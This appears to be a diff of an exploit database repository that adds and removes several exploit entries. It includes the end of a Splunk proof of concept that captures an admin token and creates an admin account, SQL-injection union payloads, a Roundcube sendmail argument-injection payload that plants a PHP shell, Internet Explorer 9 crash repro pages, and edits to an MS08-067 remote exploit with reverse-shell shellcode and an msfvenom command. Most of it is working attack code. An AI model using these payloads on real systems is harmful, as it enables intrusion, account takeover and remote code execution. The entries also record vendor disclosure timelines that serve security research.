+    create_user_uri = "https://<SPLUNK
+IP>:8089/services/authentication/users"
+    params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
+    auth_header = {'Authorization': 'Splunk %s' % token}
+    requests.packages.urllib3.disable_warnings()
+    response = requests.post(url=create_user_uri, data=params,
+headers=auth_header, verify=False)
+    if "<title>infosec" in response.content:
+       print "[+] POC admin account 'infosec:password' successfully
+created"
+    else:
+       print "[-] No account was created"
+       print response.content
+
+if __name__ == "__main__":
+    try:
+        print "[+] Starting HTTP Listener"
+        server = HTTPServer(("", 8080), MyHandler)
+        while adminTokenNotCaptured():
+            server.handle_request()
+        poc()
+    except KeyboardInterrupt:
+        print "[+] Stopping HTTP Listener"
+        server.socket.close()
+
+'''
++----------+
+| Solution |
++----------+
+Update to Splunk 6.5.0 or later. Full information about all patched
+versions are provided in the reference links below.
+
++------------+
+|  Timeline  |
++------------+
+24/08/2016 – Initial disclosure to vendor
+25/08/2016 – Vendor acknowledges receipt of the advisory and confirms
+vulnerability.
+28/09/2016 – Sent follow up email asking for status update
+30/09/2016 – Vendor replies fixes are being backported to all supported
+versions of the software.
+10/11/2016 – Vendor releases security advisory and patched software versions
+09/12/2016 – Public disclosure
+
++------------+
+| Additional |
++------------+
+http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
+https://www.splunk.com/view/SP-CAAAPSR [SPL-128840]
+'''

platforms/php/webapps/31963.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/29923/info
-
-Link ADS 1 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
-
-Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
-
-http://www.example.com/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
-
-http://www.example.com/out.php?linkid=50+and+1=1 (true)
-http://www.example.com/out.php?linkid=50+and+1=2 (false) 

platforms/php/webapps/31981.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/29975/info
-
-PolyPager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-PolyPager 1.0rc2 and prior versions are vulnerable. 
-
-http://www.example.com/polypager/?[Web Page]&nr=[XSS] 

platforms/php/webapps/40892.txt

@@ -0,0 +1,110 @@
+Roundcube 1.2.2: Command Execution via Email
+============================================
+You can find the online version of the advisory here:
+https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
+
+Found by Robin Peraglie with RIPS
+
+Introduction
+------------
+Roundcube is a widely distributed open-source webmail software used by
+many organizations and companies around the globe. The mirror on
+SourceForge, for example, counts more than 260,000 downloads in the last
+12 months which is only a small fraction of the actual users. Once
+Roundcube is installed on a server, it provides a web interface for
+authenticated users to send and receive emails with their web browser.
+
+Affected Versions: 1.0.0 - 1.2.2
+
+Requirements
+------------
+- Roundcube must be configured to use PHP's mail() function (by default)
+- PHP's mail() function is configured to use sendmail (by default)
+- PHP is configured to have safe_mode turned off (by default)
+- An attacker must know or guess the absolute path of the webroot
+
+Description
+-----------
+In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
+into the fifth argument of a call to PHP's built-in function mail()
+which is documented as security critical. The problem is that the
+invocation of the mail() function will cause PHP to execute the sendmail
+program. The fifth argument allows to pass arguments to this execution
+which allows a configuration of sendmail. Since sendmail offers the -X
+option to log all mail traffic in a file, an attacker can abuse this
+option and spawn a malicious PHP file in the webroot directory of the
+attacked server. The following code lines trigger the vulnerability.
+
+program/steps/mail/sendmail.inc
+********************************************************************************
+$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
+true, $message_charset);
+⋮	
+$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
+$mailbody_file, $smtp_opts);
+********************************************************************************
+
+Here, the value of the POST parameter "_from" is fetched and Roundcube's
+deliver_message() method is invoked with the value used as second
+argument $from.
+
+program/lib/Roundcube/rcube.php
+********************************************************************************
+public function deliver_message(&$message, $from, $mailto, &$error,
+&$body_file = null, $options = null) {
+	⋮
+	if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
+		$sent = mail($to, $subject, $msg_body, $header_str);
+	else
+		$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
+********************************************************************************
+
+This method will then pass the $from parameter to a call of the mail()
+function. The idea is to pass a custom "from" header to the sendmail
+program via the "-f" option.
+
+Proof of Concept
+----------------
+When an email is sent with Roundcube, the HTTP request can be
+intercepted and altered. Here, the "_from" parameter can be modified in
+order to place a malicious PHP file on the system.
+
+********************************************************************************
+example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
+********************************************************************************
+
+This allows an attacker to spawn a shell file "rce.php" in the web root
+directory with the contents of the "_subject" parameter that can contain
+PHP code. After performing the request, a file with the following
+content is created:
+
+********************************************************************************
+04731 >>> Recipient names must be specified
+04731 <<< To: squinty@localhost
+04731 <<< Subject: <?php phpinfo(); ?>
+04731 <<< X-PHP-Originating-Script: 1000:rcube.php
+04731 <<< MIME-Version: 1.0
+04731 <<< Content-Type: text/plain; charset=US-ASCII;
+04731 <<<  format=flowed
+04731 <<< Content-Transfer-Encoding: 7bit
+04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
+04731 <<< From: example@example.com -OQueueDirectory=/tmp
+04731 <<<  -X/var/www/html/rce.php
+04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
+04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
+04731 <<<  -X/var/www/html/rce.php
+04731 <<< User-Agent: Roundcube Webmail/1.2.2
+04731 <<<
+04731 <<< Funny e-mail message
+04731 <<< [EOF]
+********************************************************************************
+
+Since the email data is unencoded, the subject parameter will be
+reflected in plaintext which allows the injection of PHP tags into the
+shell file.
+
+Time Line
+---------
+* 2016/11/21: First contact with vendor
+* 2016/11/28: Vendor agrees to coordinated disclosure
+* 2016/11/28: Vendor releases updated version Roundcube 1.2.3

platforms/windows/dos/40893.html

@@ -0,0 +1,61 @@
+<!--
+Source: http://blog.skylined.nl/20161207001.html
+
+Synopsis
+
+A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
+
+Known affected software and attack vectors
+
+Microsoft Internet Explorer 9
+
+An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path.
+
+Details
+
+This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below.
+
+Repro.html:
+-->
+
+<!doctype html>
+<html>
+  <head>
+    <script>
+      window.onload=function(){location.reload();};
+    </script>
+  </head>
+  <body>
+    <var>
+      <img class="float" ismap="ismap" usemap="map"/>
+      <map id="map"><area/></map>
+      <dfn class="float"></dfn>
+      <a class="float"></a>
+      <input class="zoom"/>
+      text
+    </var>
+    <q class="border float zoom" xml:space="preserve">  </q>
+  </body>
+  <style type="text/css">
+  .float {
+    float:left;
+  }
+  .zoom {
+    zoom:3000%;
+  }
+  .border::first-letter {
+    border-top:1px;
+  }
+  </style>
+</html>
+
+<!--
+Time-line
+
+1 November 2012: This vulnerability was found through fuzzing.
+2 November 2012: This vulnerability was submitted to ZDI.
+19 November 2012: This vulnerability was acquired by ZDI.
+4 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
+29 May 2013: Microsoft addresses this vulnerability in MS13-037.
+7 December 2016: Details of this vulnerability are released.
+-->

platforms/windows/dos/40894.html

@@ -0,0 +1,63 @@
+<!--
+Source: http://blog.skylined.nl/20161208001.html
+
+Synopsis
+
+A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
+
+Known affected software and attack vectors
+
+Microsoft Internet Explorer 9
+
+An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path.
+
+Details
+
+This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The EIP provided me with some details of their analysis, which I'll paraphrase here: It is a use-after-free vulnerability where the span object in the frame.html file is reused after being freed. It appears to be impossible to reallocate the freed memory before it is reused. Part of the freed memory is overwritten when it is freed because a WORD Free­Entry­Offset value is stored at offset 0. This value is then used as part of a pointer to a vftable in order to call a method. This pointer now consist of the upper 16-bits of the old vftable and the lower 16-bits contain the Free­Entry­Offset value. Exploitation is near impossible without a way to have more control over this pointer in the freed memory block. ZDI also did a more thorough analysis and provide very similar details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below.
+
+Repro.html:
+-->
+
+<html>
+  <body onload="location.reload();">
+    <iframe src="Frame.html"></iframe>
+  </body>
+</html>
+
+<!--
+Frame.html:
+
+<!doctype html>
+<html>
+  <head>
+    <style type="text/css">
+      .x{
+        display:table-caption;
+      }
+      .x:first-line{
+        text-transform:uppercase;
+      }
+    </style>
+  </head>
+  <body>
+    <a>
+      <span class="x">
+        <a>
+        </a>
+      </span>
+    </a>
+  </body>
+</html>
+
+
+Time-line
+
+27 September 2012: This vulnerability was found through fuzzing.
+3 October 2012: This vulnerability was submitted to EIP.
+11 October 2012: This vulnerability was rejected by EIP.
+2 November 2012: This vulnerability was submitted to ZDI.
+19 November 2012: This vulnerability was acquired by ZDI.
+22 January 2013: This vulnerability was disclosed to Microsoft by ZDI.
+29 May 2013: Microsoft addresses this vulnerability in MS13-037.
+8 December 2016: Details of this vulnerability are released.
+-->

platforms/windows/dos/40896.html

@@ -0,0 +1,182 @@
+<!--
+Source: http://blog.skylined.nl/20161209001.html
+
+Synopsis
+
+A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
+
+Known affected software and attack vectors
+
+Microsoft Internet Explorer 9
+
+An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
+
+Details
+
+This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. In addition, EIP said they were already aware of the bug and provided no details, this issue appears to have been fixed before ZDI was able to look at it. I have included a number of reports created using a predecessor of Bug­Id below.
+
+Repro.html:
+-->
+
+<html>
+  <head>
+    <script src="get­Element­Tree.js"></script>
+    <script src="show.html"></script>
+    <script>
+      // First tag can be any inline but must NOT be closed yet
+      // Second tag can be anything that's not inline.
+      // "text1" can be anything
+      document.write('<s><br>text1');
+      // The tree is in good shape.
+      show("DOM Tree after first write", get­Element­Tree(document.body));
+      // At this point, it appears that MSIE is still waiting for the first tag from the first write to be closed.
+      // Inserting a P tag using any of the "Justify*"-, "Indent"- or "Outdent"-exec­Commands will mess up the DOM tree,
+      // specifically for the "Justify*"- and "Outdent"-exec­Command:
+      // - the S tag will partially become a child of the P tag:
+      //      P.last­Child == S (but P.child­Nodes = [BR, text1])
+      // - the P tag will partially become a child of the S tag:
+      //      S.first­Child == P and S.child­Nodes = [P] (but S.last­Child = text1)
+      // - The P partially becomes a child of the BODY tag:
+      //      BODY.last­Child = P (but BODY.first­Child = S and BODY.child­Nodes = [S])
+      // (The situation is similar for "Indent", but includes a BLOCKQUOTE element)
+      document.exec­Command('Select­All');
+      document.exec­Command('Justify­Right');
+      show("DOM Tree after outdent", get­Element­Tree(document.body));
+      // At this point, MSIE is not yet crashing. However, another write will corrupt memory:
+      document.write('text2');
+      // You will probably not see this popup. If you do, it will display an obviously corrupt DOM element tree.
+      show("DOM Tree after write", get­Element­Tree(document.body));
+    </script>
+  </head>
+</html>
+
+
+<!--
+get­Element­Tree.js:
+
+function get­Element­Tree(o­Root­Element, b­Include­All) {
+  function get­Element­Name(o­Element) {
+    return o­Element ? (o­Element.tag­Name || o­Element.node­Name + ':"' + o­Element.data + '"') : "null";
+  }
+  function get­Element­Tree­Lines(o­Element, o­Expected­Parent, o­Expected­Previous­Sibling, o­Expected­Next­Sibling,
+      s­First­Line­Prefix, s­Sub­Lines­Prefix) {
+    if (!o­Element) return [s­First­Line­Prefix + "null"];
+    var ao­Children = o­Element.child­Nodes,
+        s­Header = s­First­Line­Prefix + get­Element­Name(o­Element);
+    try {
+      if (o­Expected­Parent && o­Element.parent­Node != o­Expected­Parent)
+          s­Header += " (parent:" + get­Element­Name(o­Element.parent­Node) + ")";
+    } catch (e) {
+      s­Header += " (parent error:" + e.message + ")"; 
+    }
+    try {
+      if (o­Element.previous­Sibling != o­Expected­Previous­Sibling) {
+        s­Header += " (previous­Sibling:" + get­Element­Name(o­Element.previous­Sibling) + ")";
+        o­Expected­Previous­Sibling && ao­Should­Be­Included­Elements.push(o­Element.previous­Sibling);
+      }
+    } catch (e) {
+      s­Header += " (previous­Sibling error:" + e.message + ")"; 
+    }
+    try {
+      if (o­Element.next­Sibling != o­Expected­Next­Sibling) {
+        s­Header += " (next­Sibling:" + get­Element­Name(o­Element.next­Sibling) + ")";
+        o­Expected­Next­Sibling && ao­Should­Be­Included­Elements.push(o­Element.next­Sibling);
+      }
+    } catch (e) {
+      s­Header += " (next­Sibling error:" + e.message + ")"; 
+    }
+    try {
+      if (ao­Children.length > 0 && o­Element.first­Child != ao­Children.item(0)) {
+        s­Header += " (first­Child:" + get­Element­Name(o­Element.first­Child) + ")";
+        ao­Should­Be­Included­Elements.push(o­Element.first­Child);
+      }
+    } catch (e) {
+      s­Header += " (first­Child error:" + e.message + ")"; 
+    }
+    for (var i = 0; i < ao­Actually­Included­Elements.length; i++) {
+      if (ao­Actually­Included­Elements[i] == o­Element) {
+        return [s­Header + " => previously referenced!"];
+      }
+    }
+    var s­Last­Child­Error­Line = null;
+    try {
+      if (ao­Children.length > 0 && o­Element.last­Child != ao­Children.item(ao­Children.length - 1)) {
+        s­Last­Child­Error­Line = s­Sub­Lines­Prefix + "\u2514 last­Child:" + get­Element­Name(o­Element.last­Child);
+        ao­Should­Be­Included­Elements.push(o­Element.last­Child);
+      }
+    } catch (e) {
+      s­Last­Child­Error­Line = s­Sub­Lines­Prefix + "\u2514 last­Child error:" + e.message;
+    }
+    ao­Actually­Included­Elements.push(o­Element);
+    var as­Tree = [s­Header], o­Previous­Sibling = null;
+    for (var i = 0; i < ao­Children.length; i++) {
+      try {
+        var o­Child = ao­Children.item(i)
+      } catch (e) {
+        as­Tree.push(s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? "\u255A" : "\u2560") + "child error:" + e.message);
+        continue;
+      }
+      try {
+        var o­Next­Sibling = i + 1 <= ao­Children.length - 1 ? ao­Children.item(i + 1) : null;
+      } catch (e) {
+        o­Next­Sibling = "error: " + e.message;
+      }
+      var as­Child­Tree = get­Element­Tree­Lines(o­Child, o­Element, o­Previous­Sibling, o­Next­Sibling, 
+          s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? "\u255A" : "\u2560"),
+          s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? (s­Last­Child­Error­Line ? "\u2502" : " ") : "\u2551"));
+      o­Previous­Sibling = o­Child;
+      for (j = 0; j < as­Child­Tree.length; j++) {
+        as­Tree.push(as­Child­Tree[j]);
+      }
+    }
+    if (s­Last­Child­Error­Line) {
+      as­Tree.push(s­Last­Child­Error­Line);
+    }
+    return as­Tree;
+  }
+  var ao­Should­Be­Included­Elements = [o­Root­Element], ao­Actually­Included­Elements = []
+  var as­Tree­Blocks = [];
+  find_­next_­missing_­element:
+  while(ao­Should­Be­Included­Elements.length) {
+    var o­Should­Be­Included­Element = ao­Should­Be­Included­Elements.pop();
+    for (var j = 0; j < ao­Actually­Included­Elements.length; j++) {
+      if (o­Should­Be­Included­Element == ao­Actually­Included­Elements[j]) {
+        continue find_­next_­missing_­element;
+      }
+    }
+    as­Tree­Lines = get­Element­Tree­Lines(o­Should­Be­Included­Element, o­Should­Be­Included­Element.parent­Node,
+        o­Should­Be­Included­Element.previous­Sibling, o­Should­Be­Included­Element.next­Sibling, 
+        o­Should­Be­Included­Element.parent­Node ? "\u255A" : "",
+        o­Should­Be­Included­Element.parent­Node ? " " : "");
+    as­Tree­Blocks.push(as­Tree­Lines.join("\r\n"));
+    if (!b­Include­All) break;
+  }
+  return as­Tree­Blocks.join("\r\n");
+}
+
+
+show.html:
+
+//<!--
+  function show(s­Title, s­Message) {
+    show­Modal­Dialog("show.html", [s­Title, "<pre>" + s­Message + "</pre>"],
+      "dialog­Width:800px; dialog­Height:600px; resizable:yes");
+  }
+/*-->
+<script>
+  document.body.inner­HTML = window.dialog­Arguments[1];
+  document.title = window.dialog­Arguments[0];
+</script>
+<!-- */ // -->
+
+Time-line
+
+27 September 2012: This vulnerability was found through fuzzing.
+7 November 2012: This vulnerability was submitted to EIP.
+27 November 2012: This vulnerability was rejected by EIP.
+28 November 2012: This vulnerability was submitted to ZDI.
+Between December 2012 and February 2013: Microsoft addresses this vulnerability.
+27 February 2012: This vulnerability was rejected by ZDI.
+8 December 2016: Details of this vulnerability are released.
+I would like to note that although ZDI did not acquire the vulnerability as it was patched before they could finish analysis, they did offer me ZDI reward points as a courtesy.
+-->

platforms/windows/remote/40279.py

@@ -1,16 +1,10 @@
-# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS08_067.py
-
 import struct
 import time
 import sys
 
 
-
 from threading import Thread    #Thread is imported incase you would like to modify
 
-                               
-
-
 
 try:
 
@@ -18,9 +12,10 @@ try:
 
     from impacket import uuid
 
-    from impacket.dcerpc import dcerpc
+    from impacket import dcerpc
+
+    from impacket.dcerpc.v5 import transport
 
-    from impacket.dcerpc import transport
 
 except ImportError, _:
 
@@ -33,24 +28,18 @@ except ImportError, _:
     sys.exit(1)
 
 
-
-
-
 print '#######################################################################'
 
 print '#   MS08-067 Exploit'
 
-print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). 
+print '#   This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
 
 print '#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
 
 print '#######################################################################\n'
 
 
-
-
-
-#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40; 
+#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
 #Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
 #EXITFUNC=thread Important!
 #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
@@ -125,15 +114,15 @@ class SRVSVC_Exploit(Thread):
         self.__port   = port
 
         self.target   = target
-		self.os	      = os
-	
+	self.os	      = os
+
 
     def __DCEPacket(self):
 	if (self.os=='1'):
 		print 'Windows XP SP0/SP1 Universal\n'
 		ret = "\x61\x13\x00\x01"
 		jumper = nonxjmper % (ret, ret)
-		elif (self.os=='2'):
+	elif (self.os=='2'):
 		print 'Windows 2000 Universal\n'
 		ret = "\xb0\x1c\x1f\x00"
 		jumper = nonxjmper % (ret, ret)
@@ -215,9 +204,9 @@ if __name__ == '__main__':
 				print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
 				print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
 
-               sys.exit(-1)
+				sys.exit(-1)
+
 
-            
 
 current = SRVSVC_Exploit(target, os)